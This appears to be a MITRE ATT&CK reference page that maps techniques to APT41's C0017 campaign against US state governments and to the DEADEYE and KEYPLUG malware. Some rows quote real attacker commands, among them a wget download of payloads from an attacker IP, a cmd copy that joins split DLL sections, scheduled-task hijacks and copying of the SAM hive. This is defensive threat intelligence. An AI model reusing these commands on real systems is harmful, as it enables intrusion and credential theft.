Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
Not cited by any technique.
None recorded.
| Technique | Used by | Procedure example |
|---|---|---|
| T1001.003 Protocol or Service Impersonation |
CampaignC0017 | During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server. |
| T1003.002 Security Account Manager |
CampaignC0017 | During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting. |
| T1005 Data from Local System |
CampaignC0017 | During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks. |
| T1016 System Network Configuration Discovery |
CampaignC0017 | During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery. |
| T1016 System Network Configuration Discovery |
MalwareDEADEYE | DEADEYE can discover the DNS domain name of a targeted system. |
| T1027 Obfuscated Files or Information |
CampaignC0017 | During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection. |
| T1027.002 Software Packing |
CampaignC0017 | During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries. |
| T1027.009 Embedded Payloads |
MalwareDEADEYE | The DEADEYE.EMBED variant of DEADEYE has the ability to embed payloads inside of a compiled binary. |
| T1027.013 Encrypted/Encoded File |
MalwareDEADEYE | DEADEYE has encrypted its payload. |
| T1027.013 Encrypted/Encoded File |
MalwareKEYPLUG | KEYPLUG can use a hardcoded one-byte XOR encoded configuration file. |
| T1033 System Owner/User Discovery |
CampaignC0017 | During C0017, APT41 used `whoami` to gather information from victim machines. |
| T1036.004 Masquerade Task or Service |
MalwareDEADEYE | DEADEYE has used `schtasks /change` to modify scheduled tasks including `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`. |
| T1036.004 Masquerade Task or Service |
CampaignC0017 | During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code. |
| T1036.005 Match Legitimate Resource Name or Location |
CampaignC0017 | During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections. |
| T1041 Exfiltration Over C2 Channel |
CampaignC0017 | During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration. |
| T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol |
CampaignC0017 | During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain. |
| T1053.005 Scheduled Task |
CampaignC0017 | During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`. |
| T1059.003 Windows Command Shell |
CampaignC0017 | During C0017, APT41 used `cmd.exe` to execute reconnaissance commands. |
| T1059.003 Windows Command Shell |
MalwareDEADEYE | DEADEYE can run `cmd /c copy /y /b C:\Users\public\syslog_6-*.dat C:\Users\public\syslog.dll` to combine separated sections of code into a single DLL prior to execution. |
| T1059.007 JavaScript |
CampaignC0017 | During C0017, APT41 deployed JScript web shells on compromised systems. |
| T1069.002 Domain Groups |
Tooldsquery | dsquery can be used to gather information on permission groups within a domain. |
| T1071.001 Web Protocols |
MalwareKEYPLUG | KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2. |
| T1071.001 Web Protocols |
CampaignC0017 | During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads. |
| T1074.001 Local Data Staging |
CampaignC0017 | During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory. |
| T1082 System Information Discovery |
MalwareDEADEYE | DEADEYE can enumerate a victim computer's volume serial number and host name. |
| T1082 System Information Discovery |
Tooldsquery | dsquery has the ability to enumerate various information, such as the operating system and host name, for systems within a domain. |
| T1087.002 Domain Account |
Tooldsquery | dsquery can be used to gather information on user accounts within a domain. |
| T1090 Proxy |
MalwareKEYPLUG | KEYPLUG has used Cloudflare CDN associated infrastructure to redirect C2 communications to malicious domains. |
| T1090 Proxy |
CampaignC0017 | During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic. |
| T1095 Non-Application Layer Protocol |
MalwareKEYPLUG | KEYPLUG can use TCP and KCP (KERN Communications Protocol) over UDP for C2 communication. |
| T1102 Web Service |
CampaignC0017 | During C0017, APT41 used the Cloudflare services for C2 communications. |
| T1102.001 Dead Drop Resolver |
CampaignC0017 | During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign. |
| T1102.001 Dead Drop Resolver |
MalwareKEYPLUG | The KEYPLUG Windows variant has retrieved C2 addresses from encoded data in posts on tech community forums. |
| T1105 Ingress Tool Transfer |
CampaignC0017 | During C0017, APT41 downloaded malicious payloads onto compromised systems. |
| T1106 Native API |
MalwareDEADEYE | DEADEYE can execute the `GetComputerNameA` and `GetComputerNameExA` WinAPI functions. |
| T1124 System Time Discovery |
MalwareKEYPLUG | KEYPLUG can obtain the current tick count of an infected computer. |
| T1134 Access Token Manipulation |
CampaignC0017 | During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation. |
| T1140 Deobfuscate/Decode Files or Information |
CampaignC0017 | During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads. |
| T1140 Deobfuscate/Decode Files or Information |
MalwareKEYPLUG | KEYPLUG can decode its configuration file to determine C2 protocols. |
| T1140 Deobfuscate/Decode Files or Information |
MalwareDEADEYE | DEADEYE has the ability to combine multiple sections of a binary which were broken up to evade detection into a single .dll prior to execution. |
| T1190 Exploit Public-Facing Application |
CampaignC0017 | During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access. |
| T1218.007 Msiexec |
MalwareDEADEYE | DEADEYE can use `msiexec.exe` for execution of malicious DLL. |
| T1218.011 Rundll32 |
MalwareDEADEYE | DEADEYE can use `rundll32.exe` for execution of living off the land binaries (lolbin) such as `SHELL32.DLL`. |
| T1480 Execution Guardrails |
MalwareDEADEYE | DEADEYE can ensure it executes only on intended systems by identifying the victim's volume serial number, hostname, and/or DNS domain. |
| T1505.003 Web Shell |
CampaignC0017 | During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects. |
| T1560.003 Archive via Custom Method |
CampaignC0017 | During C0017, APT41 hex-encoded PII data prior to exfiltration. |
| T1564.004 NTFS File Attributes |
MalwareDEADEYE | The DEADEYE.EMBED variant of DEADEYE can embed its payload in an alternate data stream of a local file. |
| T1567 Exfiltration Over Web Service |
CampaignC0017 | During C0017, APT41 used Cloudflare services for data exfiltration. |
| T1573.002 Asymmetric Cryptography |
MalwareKEYPLUG | KEYPLUG can use TLS-encrypted WebSocket Protocol (WSS) for C2. |
| T1574 Hijack Execution Flow |
CampaignC0017 | During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries. |
Showing the first 50.
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.